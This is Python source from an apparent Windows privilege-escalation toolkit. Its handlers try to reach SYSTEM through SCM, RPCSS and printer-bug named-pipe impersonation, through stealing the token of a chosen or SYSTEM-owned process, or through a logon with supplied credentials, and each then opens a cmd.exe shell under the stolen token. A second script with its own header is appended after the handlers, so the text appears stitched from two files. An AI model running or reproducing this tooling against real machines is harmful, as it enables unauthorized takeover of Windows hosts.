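def scm(args):
    """
    Try to obtain a SYSTEM shell through the SCM named-pipe impersonation path.

    :param args: dict of parsed options; only the "toSystem" flag is read here
    :return: None; nothing is attempted unless args["toSystem"] is set
    """
    if not args["toSystem"]:
        return
    printT("Try to spawn a system shell via scm & impersonation...")
    esc = Escalation()
    imp = Impersonate()
    status = esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False)
    # The current thread token is printed whether or not the escalation
    # reported success, so the caller can see what (if anything) changed.
    imp.printCurrentThreadEffectiveToken()
    if status:
        # Reuse the Impersonate() instance created above instead of building
        # a second one, as the other handlers in this file do.
        imp.executeCMDWithThreadEffectiveToken()
    else:
        # Report failure explicitly, matching the rpcss/imppid handlers.
        logging.error("Impossible to spawn a system shell via scm")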
def rpcss(args):
    """
    Attempt the RPCSS named-pipe impersonation path and, on success, start a
    cmd.exe with the thread's effective token.

    :param args: parsed options (not read by this handler)
    :return: None; failure is reported through logging.error
    """
    printT("Trying to exploit 'RPCSS'...")
    printT("It can take many seconds, so wait...")
    escalation = Escalation()
    succeeded = escalation.namedPipeImpersonationSystemViaRPCSS()
    if succeeded != True:
        logging.error("Impossible to exploit 'RPCSS'")
        return
    impersonator = Impersonate()
    impersonator.enableAllUserRights()
    impersonator.executeCMDWithThreadEffectiveToken()
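def imppid(args):
    """
    Impersonate the primary token of the process given by args['pid'] and
    try to start a cmd.exe under it.

    :param args: dict of parsed options; reads args['pid']
    :return: None; errors are reported through logging.error
    """
    pid = args['pid']
    if pid is None:
        logging.error("A pid has to be selected")
        return
    printT("Impersonating primary token of pid {0}".format(pid))
    imp = Impersonate()
    imp.enableAllUserRights()
    if not imp.impersonateViaPID(pid=pid):
        logging.error("Impossible to impersonate")
        return
    printT("Trying to open a cmd shell...")
    printT(
        "NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell"
    )
    imp.printCurrentThreadEffectiveToken()
    # enableAllUserRights() is called again after impersonation — presumably
    # because the thread now carries a different token than the one adjusted
    # above; confirm against Impersonate.enableAllUserRights before removing.
    imp.enableAllUserRights()
    imp.executeCMDWithThreadEffectiveToken()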
def searchimpfirstsystem(args):
    '''
    Impersonate the first nt authority\\system token that can be found and
    start a cmd.exe under it.

    :param args: dict of parsed options; args['pid'] is passed as targetPID
    :return: True if a shell was started, otherwise False
    '''
    printT("Searching and impersonating first nt authority\\system token...")
    impersonator = Impersonate()
    found = impersonator.searchAndImpersonateFirstSystemToken(
        targetPID=args['pid'], printAllTokens=False)
    if found != True:
        logging.error("Impossible to prompt a cmd.exe as system.")
        return False
    impersonator.enableAllUserRights()
    impersonator.executeCMDWithThreadEffectiveToken()
    printT("cmd.exe prompt started as system")
    return True
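def impuser(args):
    """
    Log on with the username/password/domain taken from args and run cmd.exe
    under the resulting token.

    :param args: dict of parsed options; reads 'username', 'password', 'domain'
    :return: None; errors are reported through logging.error
    """
    if args['username'] is None or args['password'] is None:
        logging.error("username or password has to be given")
        return
    printT("Try to impersonate via creds...")
    imp = Impersonate()
    # Interactive logon with the default provider. The password is handed
    # straight to impersonateViaCreds and is never echoed by this handler.
    status = imp.impersonateViaCreds(
        login=args['username'],
        password=args['password'],
        domain=args['domain'],
        logonType=LOGON32_LOGON_INTERACTIVE,
        logonProvider=LOGON32_PROVIDER_DEFAULT)
    if not status:
        logging.error("Impossible to impersonate via creds")
        return
    printT("Impersonation success, try to spawn a shell...")
    printT(
        "SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME should be required"
    )
    imp.printCurrentThreadEffectiveToken(printFull=True, printLinked=False)
    imp.executeCMDWithThreadEffectiveToken()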
# -*- coding: UTF-8 -*-
# By Quentin HARDY ([email protected]) - bobsecq

import sys
sys.path.append('../')
from utils import *
configureLogging()
from escalation import Escalation
from impersonate import Impersonate

esc = Escalation()
# Named-pipe impersonation via the printer bug. The return value is not
# captured here, so the calls below run whether or not it succeeded.
esc.namedPipeImpersonationSystemViaPrinterBug()
imp = Impersonate()
imp.enableAllUserRights()  # Not necessary, but done anyway
imp.executeCMDWithThreadEffectiveToken()